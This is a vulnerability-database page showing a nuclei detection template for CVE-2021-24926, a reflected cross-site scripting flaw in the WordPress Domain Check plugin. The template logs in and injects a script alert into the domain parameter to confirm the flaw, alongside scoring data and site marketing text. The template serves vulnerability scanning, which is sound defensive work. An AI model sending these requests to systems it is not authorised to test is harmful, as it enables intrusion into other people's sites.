Lucene search
K

WordPress Domain Check <1.0.17 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

WordPress Domain Check plugin <1.0.17 - Reflected Cross-Site Scripting vulnerability. Unsanitized domain parameter in page output

Related
Refs
Code
id: CVE-2021-24926

info:
  name: WordPress Domain Check <1.0.17 - Cross-Site Scripting
  author: cckuailong
  severity: medium
  description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.
  impact: |
    Attackers can inject malicious JavaScript via reflected XSS in the domain parameter, potentially stealing administrator session cookies or performing administrative actions.
  remediation: |
    Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24926
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24926
    cwe-id: CWE-79
    epss-score: 0.12857
    epss-percentile: 0.95818
    cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: domaincheckplugin
    product: domain_check
    framework: wordpress
  tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Domain Check"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220579f72c1100fae9ce3ea1acd08dafadc5f7d3b75aa4c0e21fb8c20bef2d4faf6022059eb53ba52fe501771eac2d3b2e2e98ebe477d79b96acf69d8eb027099315551:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.12857
29